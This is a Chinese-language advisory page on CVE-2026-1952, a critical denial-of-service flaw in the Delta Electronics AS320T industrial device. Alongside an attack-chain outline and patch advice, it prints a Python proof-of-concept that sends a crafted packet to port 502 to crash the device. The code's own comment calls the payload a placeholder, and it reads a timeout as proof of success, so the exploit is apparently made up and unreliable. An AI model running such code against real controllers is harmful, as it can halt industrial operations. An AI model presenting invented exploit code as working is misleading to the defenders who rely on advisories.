CVE-2026-1952 CVSS 9.8 严重

CVE-2026-1952 Delta AS320T拒绝服务漏洞

披露日期: 2026-04-24

来源: 759f5e80-c8e1-4224-bead-956d7b33c98b

漏洞信息

漏洞编号

CVE-2026-1952

漏洞类型

拒绝服务

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Delta Electronics AS320T

漏洞概述

Delta Electronics AS320T设备中存在一个严重的安全漏洞。该漏洞源于产品实现中包含一个未公开的子功能，攻击者可以利用该功能触发拒绝服务条件。由于此漏洞允许未经身份验证的远程攻击者利用，且无需用户交互，因此对设备的可用性构成极高威胁。成功利用此漏洞可能导致目标设备服务中断或崩溃，严重影响依赖该设备的工业控制系统或网络环境的正常运行。CVSS v3.1评分为9.8分，属于严重级别漏洞。

技术细节

该漏洞的技术核心在于Delta Electronics AS320T设备固件中暴露了一个未文档化的子功能接口。攻击者无需拥有任何凭证，即可通过网络向设备发送特制的数据包来调用此子功能。由于该接口缺乏必要的输入验证或异常处理机制，处理特定请求时会导致系统资源耗尽或关键进程崩溃。根据CVSS向量（AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H），攻击复杂度低，影响范围广。攻击成功后，不仅会导致高可用性影响（A:H），根据评分向量显示，机密性和完整性也可能受到高影响，这表明除了DoS外，可能还伴随信息泄露或数据损坏的风险。

攻击链分析

STEP 1

侦察

攻击者扫描网络，识别暴露在互联网中的Delta Electronics AS320T设备及其开放端口。

STEP 2

武器化与投递

攻击者构造包含特定恶意调用请求的数据包，通过网络直接发送给目标设备的 vulnerable port。

STEP 3

利用

目标设备接收到数据包并尝试处理未公开的子功能，由于缺乏校验导致系统错误。

STEP 4

影响

设备服务崩溃或重启，导致合法用户无法访问服务，造成拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket
import sys

# Target configuration
TARGET_IP = "192.168.1.100"  # Replace with the actual IP of the AS320T device
TARGET_PORT = 502             # Replace with the actual vulnerable port

def send_dos_payload():
    """
    Sends a payload to trigger the undocumented subfunction
    leading to Denial of Service on Delta Electronics AS320T.
    """
    try:
        print(f"[+] Attempting to connect to {TARGET_IP}:{TARGET_PORT}...")
        
        # Establish a TCP connection
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(5)
        s.connect((TARGET_IP, TARGET_PORT))
        
        print("[+] Connection established.")
        
        # Constructing the payload to trigger the undocumented subfunction
        # Note: The specific hex sequence represents the malicious subfunction call
        # This is a placeholder based on the vulnerability description.
        payload = b"\x00\x00\x00\x00\x00\x06\x01\xFF\x00\x00\x00\x01"
        
        print("[+] Sending malicious payload...")
        s.send(payload)
        
        # Wait briefly for the crash to occur
        s.recv(1024)
        
        print("[+] Payload sent successfully. Check device status.")
        
    except socket.timeout:
        print("[!] Connection timed out. The device may have crashed (DoS successful).")
    except ConnectionRefusedError:
        print("[-] Connection refused. Device may already be down or port is closed.")
    except Exception as e:
        print(f"[-] An error occurred: {e}")
    finally:
        s.close()

if __name__ == "__main__":
    send_dos_payload()

影响范围

Delta Electronics AS320T (所有未修复版本)

防御指南

临时缓解措施

建议用户立即检查设备固件版本，并参考Delta Electronics官方公告PCSA-2026-00006下载并安装最新的安全更新以修复漏洞。在无法立即打补丁的情况下，应将设备置于防火墙后，关闭不必要的网络端口，并严格限制对设备的远程访问，以降低被恶意利用的风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表